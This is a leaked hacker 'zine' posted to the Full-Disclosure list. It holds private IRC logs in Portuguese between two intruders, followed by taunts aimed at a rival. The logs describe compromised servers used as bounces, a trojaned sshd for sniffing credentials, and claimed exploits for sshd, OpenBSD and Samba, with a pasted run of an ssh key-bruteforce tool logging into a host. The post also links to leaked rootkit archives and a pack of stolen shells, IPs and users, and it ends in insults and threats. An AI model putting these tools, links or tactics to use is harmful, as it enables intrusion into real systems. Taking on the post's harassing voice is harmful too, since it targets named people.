> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo
>
> -> PRIVMSG skotch :to na minha tb
> -> PRIVMSG skotch :so acho
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vc fala merda e dps quer voltar a tras
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :coisa de mlk
> -> PRIVMSG skotch :filho
> -> PRIVMSG skotch :eu so acho
> -> PRIVMSG skotch :q eh besteira
>
> -> PRIVMSG skotch :agente brigasr por isso
> -> PRIVMSG skotch :so isso
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :mermao n eh a primeira vez
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tu da dessas
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vem falando bosta
>
> :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e dps vem se desculpando
> -> PRIVMSG skotch :so joguei um verde
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n so esses verme de merda
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q paga pau pra vc
> -> PRIVMSG skotch :nao vou fazer isso denovo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q aceita tudo q vc fala
>
> -> PRIVMSG skotch :whatever
> -> PRIVMSG skotch :nao falei q tu paga sapo pra mim
> -> PRIVMSG skotch :tu tb
> -> PRIVMSG skotch :eh cheio das noia q nem eu
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :tu soh mostro q n confia
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :axando q eu passo maq pra xscholler
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :aff
>
> -> PRIVMSG skotch :porra
> -> PRIVMSG skotch :tu some
> -> PRIVMSG skotch :so joguei um verde
> -> PRIVMSG skotch :se nao confiasse
> -> PRIVMSG skotch :tu nao tinha
> -> PRIVMSG skotch :tds minhas box
>
> -> PRIVMSG skotch :TODAS
> -> PRIVMSG skotch :fdp
> -> PRIVMSG skotch :outra coisa
> -> PRIVMSG skotch :descobri
> -> PRIVMSG skotch :o klux
> -> PRIVMSG skotch :tem root na importec ->>>>>> klux has root in importec[their box] (you are right sir!)
>
> -> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>> dont use it as bounce anymore! (kinda late)
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
>
> -> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
> -> PRIVMSG skotch :pra sniffa
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n to usando mais importec faz tempo
>
> -> PRIVMSG skotch :fica ligeiro
> -> PRIVMSG skotch :eu formatei ele
> -> PRIVMSG skotch :deproposito
> -> PRIVMSG skotch :ele veio no meu pvt
> -> PRIVMSG skotch :colo uma pa de merda
> -> PRIVMSG skotch :ele sabe da ig
>
> -> PRIVMSG skotch :da locaweb
> -> PRIVMSG skotch :da pop
> -> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
> -> PRIVMSG skotch :e vice versa
>
> -> PRIVMSG skotch :q seja
> -> PRIVMSG skotch :ouytra coisa
> -> PRIVMSG skotch :peguei coisa quente
> -> PRIVMSG skotch :sshd
> -> PRIVMSG skotch :hehehe
> -> PRIVMSG skotch :remote expl
> -> PRIVMSG skotch :openbsd local ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
>
> -> PRIVMSG skotch :tu fica de putaria
> -> PRIVMSG skotch :agente perdendo tempo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :o openbsd vc a mando faz tempo
>
> -> PRIVMSG skotch :mas esse novo nao
> -> PRIVMSG skotch :entra na merda do msn
> -> PRIVMSG skotch :e para de putaria
> -> PRIVMSG skotch :por besteira
> -> PRIVMSG skotch :vou te desblokear ->>>>>>>>> i'll unblock ya from msn babe! plz come back !
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to indo pro trampo
> -> PRIVMSG skotch :vai para com a putaria de merda ?
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada
>
> -> PRIVMSG skotch : *
> -> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
> -> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing
>
> -> PRIVMSG skotch : * [!] KEY FOUND!
> -> PRIVMSG skotch : * [!] Logging in...
> -> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
> -> PRIVMSG skotch : * xxxxx@digitaljunk ~ $
>
> -> PRIVMSG skotch : *
> -> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows
> -> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :procura se informar primeiro antes de falar merda
>
> -> PRIVMSG skotch :so joguei verde
> -> PRIVMSG skotch :sou noiado
> -> PRIVMSG skotch :vc tb he
> -> PRIVMSG skotch :normal
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
>
> -> PRIVMSG skotch :nao fiz mal nenhum pra vc
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pode demorar horas pra achar a key certa
> -> PRIVMSG skotch :nao
>
> -> PRIVMSG skotch :de 5 a 10 min
> -> PRIVMSG skotch :o coideloko ja ta melhorando ele
> -> PRIVMSG skotch :pra demorar menos
> -> PRIVMSG skotch :hehe
> -> PRIVMSG skotch :a oi ta bugada
> -> PRIVMSG skotch :ele FUNCIONA
>
> -> PRIVMSG skotch :e jaja
> -> PRIVMSG skotch :to com 0day pra samba
> -> PRIVMSG skotch :aguarde
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so falo
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pra vc fica esperto
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tem gringo
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :te sniffando
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pq fikei sabendo
>
> -> PRIVMSG skotch :ta loko ?
> -> PRIVMSG skotch :so se for na bnc
> -> PRIVMSG skotch :hehehe
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :nego q ta falando com vc
>
> -> PRIVMSG skotch :ateh entao nao ligo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :soh pra causar intriga
> -> PRIVMSG skotch :porra
> -> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
>
> -> PRIVMSG skotch :<skotch> so falo
> -> PRIVMSG skotch :<skotch> pra vc fica esperto
> -> PRIVMSG skotch :<skotch> q tem gringo
> -> PRIVMSG skotch :<skotch> te sniffando
> -> PRIVMSG skotch :<skotch> pq fikei sabendo
>
> -> PRIVMSG skotch :qm sniffando ?
> -> PRIVMSG skotch :skotch
> -> PRIVMSG skotch :fala krl
> -> PRIVMSG skotch :skotch
> -> PRIVMSG skotch :skotch
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to comend mermao
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e to atrasado pro trampo
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :flw
>
> -> PRIVMSG skotch :cara
> -> PRIVMSG skotch :se tu continuar folgado
> -> PRIVMSG skotch :naovaidar
> -> PRIVMSG skotch :vai sew fude
> -> PRIVMSG skotch :fala direito
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :ultimamente
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e n trocava ideia antes
>
> <- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so vc pensar
> -> PRIVMSG skotch :whatever
> -> PRIVMSG skotch :vc
> -> PRIVMSG skotch :e o thomaz
>
> -> PRIVMSG skotch :sao os unicos
> -> PRIVMSG skotch :q tem as m erda q tenho
> -> PRIVMSG skotch :UNICOS
> -> PRIVMSG skotch :mais ngm tem
> -> PRIVMSG skotch :nao confio em m ais NGM
> -> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
>
> -> PRIVMSG skotch :so isso
> -> PRIVMSG skotch :e troquei de bnc ontemrs
> -> PRIVMSG skotch :e troquei de bnc ontem rs ->>>>>> i changed my bnc yesterday! (we're glad)
>
> -> PRIVMSG rip :skotch said to me that are sniffing me
> -> PRIVMSG rip :but skotch dont know about nothing ->>>>>> as always, backstabbing hiZ boyfriend(skotch)
>
>
> /*
>
> * Geminid IIb. TCP/UDP/ICMP Packet flooder
> *
> * What can i say? Enjoy! :)
> * gr33tz: PoWerPr0 and godmode0
> *
>
> thanks for the gem source by the way!
>
> >>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do
>
> >> anyway, if we get something else in the future, we will publish again. thanks buddies.
> > random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log
>
> ##########################################################################
> # __ __ __ __ #
> #.----.| |--.---.-.-----.| |_.-----.----. | |_| |--.----.-----.-----.#
>
> #| __|| | _ | _ || _| -__| _| | _| | _| -__| -__|#
> #|____||__|__|___._| __||____|_____|__| |____|__|__|__| |_____|_____|#
> # |__| #
>
> # #
> # - download links #
> ##########################################################################
>
> <><> thiZ iZ ZeRIouZ buZInEzZ dewD!
> <><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
> <><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
>
> <><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones]
>
> <><> please guyZ, make it priv8 ! (/me rolleyes :B)
>
> - kool&klean chapter.
>
> ##########################################################################
> # _ _ ___ #
>
> # ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _ _ #
> # / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_> #
> # \_|_.|_|_|<___|| _/ |_| \___.|_| |_| \___/`___||_| #
>
> # |_| #
> # #
> # - conclusion #
>
> ##########################################################################
>
>
> ----------------- reflection time
> >.......... whats the point of all this ? prove that you are better than someone ?
> >......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.
>
> >........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
> >....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
> >...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.
>
> >..... why would someone send you a mail? nobody cares about you, dipshit.
> >.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke
> >... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can.
>
> >.. a kiss to zmda
> >. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
> > just to finish:
>
> ******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
>
> ;
> ;
> ; _____ __ _______
> ;| |_.---.-.| |--.| __|.-----.----.
> ;| | _ || _ ||__ || -__| __|
> ;|_______|___._||_____||_______||_____|____|
> ;
>
> ; _______ __ __ __
> ;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----.
> ; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --|
> ;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____|
>
> ; ;
> ;
> ; #LABSEC @ EFNET - closed to friends, of course.
> ;
> ; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek
>
> ;
> ; lAmE ZiNE wRitTeN bY:
> ;
> ; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
> ;
> ;
> ; wE iZ watCHiNg U
> ******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/